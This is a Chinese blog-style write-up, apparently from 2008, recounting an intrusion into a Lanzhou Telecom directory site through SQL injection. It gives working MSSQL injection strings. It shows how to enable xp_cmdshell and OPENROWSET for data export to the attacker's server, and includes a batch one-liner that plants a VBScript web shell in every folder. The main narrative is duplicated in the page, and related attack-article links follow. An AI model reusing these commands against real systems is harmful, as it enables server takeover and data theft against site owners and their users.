MSSQL2005注入攻擊
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:37:47 作者:佚名
我要評論

電信級的系統(tǒng)估計都是采用比較大型的數(shù)據(jù)庫了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁面技術(shù)!
呵呵~其實注入點并不是那么好找的!畢竟
電信級的系統(tǒng)估計都是采用比較大型的數(shù)據(jù)庫了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!蘭州電信 號碼百事通的網(wǎng)站 居然是用IIS ASP!呵呵!ASP估計腳本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成靜態(tài)頁面技術(shù)!
呵呵~其實注入點并不是那么好找的!畢竟是電信的大網(wǎng)站!測試了好多個點都失敗,我個人比較喜歡找那些片偏僻的url連接!那些80%的程序員都會疏忽~! OK 來個經(jīng)典 and 0=0 and 0=1 返回不一樣的結(jié)果!看來是數(shù)字輸入的了!
不說太多~ 再看看是什么數(shù)據(jù)庫 跟ASP結(jié)合 80% 都是MSSQL了!不過也有例外的~呵呵例如第2代身份證驗證的網(wǎng)站 我記得有好幾個是采用ASP/ASPX ORACLE 的!題外話就不多說了!來點直接的!
and exists(select @@version)-- 返回正常哦~ 呵呵看來不會是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再來看看 SYBASE 沒有IS_SRVROLEMEMBER函數(shù)的!只有MS的才會有!而SYBASE判斷權(quán)限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA權(quán)限!
OK那么 就來個我的最愛 OPENROWSET
先建一個表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把遠(yuǎn)程的表導(dǎo)到我自己機器上的MSSQL
發(fā)現(xiàn)報告錯誤
不允許OPENROWSET ~~ 奇怪?? 難道是MSSQL2005?權(quán)限問題?靠!那就開唄!幸好是SA權(quán)限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--開始分布式事務(wù)
現(xiàn)在來真的了!不過還是有我最擔(dān)心的~ 就是WEB跟DATABASE是分離的!這樣搞起來就郁悶了!OK!
既然是SA 那就把他的CMDSHELL都開了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
這樣就可以開啟CMDSHELL 但是還沒有添加擴展存儲過程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其實沒有什么必要的~只是我為了方便防火墻!
再來執(zhí)行 exec master..xp_cmdshell 'ping 自己IP' 防火墻檢測到有對方IP ping自己了呵呵!然后再ping他的WEBSITE
看來是同一個IP哦~ 哈哈!那就爽了!那我就直接在他本地寫一個bat吧!
隨便找個地方用xp_cmdshell寫了個bat 內(nèi)容為
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell執(zhí)行 OK
在C盤下面所有文件夾都有這個1.asp了~ 呵呵 如此類推
把其他盤也感染.... 5分鐘過后!~ 他的所有盤 所有文件夾都有這個 1.asp的一句話~ 哈哈!來到www.lanzhouXXXXX.com 在他的web上面?zhèn)鱾€大馬子~KO~~... 記得收拾殘局!把之前的垃圾清除~呵呵
and exists(select @@version)-- 返回正常哦~ 呵呵看來不會是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再來看看 SYBASE 沒有IS_SRVROLEMEMBER函數(shù)的!只有MS的才會有!而SYBASE判斷權(quán)限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA權(quán)限!
OK那么 就來個我的最愛 OPENROWSET
先建一個表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把遠(yuǎn)程的表導(dǎo)到我自己機器上的MSSQL
發(fā)現(xiàn)報告錯誤
不允許OPENROWSET ~~ 奇怪?? 難道是MSSQL2005?權(quán)限問題?靠!那就開唄!幸好是SA權(quán)限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--開始分布式事務(wù)
現(xiàn)在來真的了!不過還是有我最擔(dān)心的~ 就是WEB跟DATABASE是分離的!這樣搞起來就郁悶了!OK!
既然是SA 那就把他的CMDSHELL都開了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
這樣就可以開啟CMDSHELL 但是還沒有添加擴展存儲過程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其實沒有什么必要的~只是我為了方便防火墻!
再來執(zhí)行 exec master..xp_cmdshell 'ping 自己IP' 防火墻檢測到有對方IP ping自己了呵呵!然后再ping他的WEBSITE
看來是同一個IP哦~ 哈哈!那就爽了!那我就直接在他本地寫一個bat吧!
隨便找個地方用xp_cmdshell寫了個bat 內(nèi)容為
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell執(zhí)行 OK
在C盤下面所有文件夾都有這個1.asp了~ 呵呵 如此類推
把其他盤也感染.... 5分鐘過后!~ 他的所有盤 所有文件夾都有這個 1.asp的一句話~ 哈哈!來到www.lanzhouXXXXX.com 在他的web上面?zhèn)鱾€大馬子~KO~~... 記得收拾殘局!把之前的垃圾清除~呵呵
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進入攻擊者郵箱2016-07-06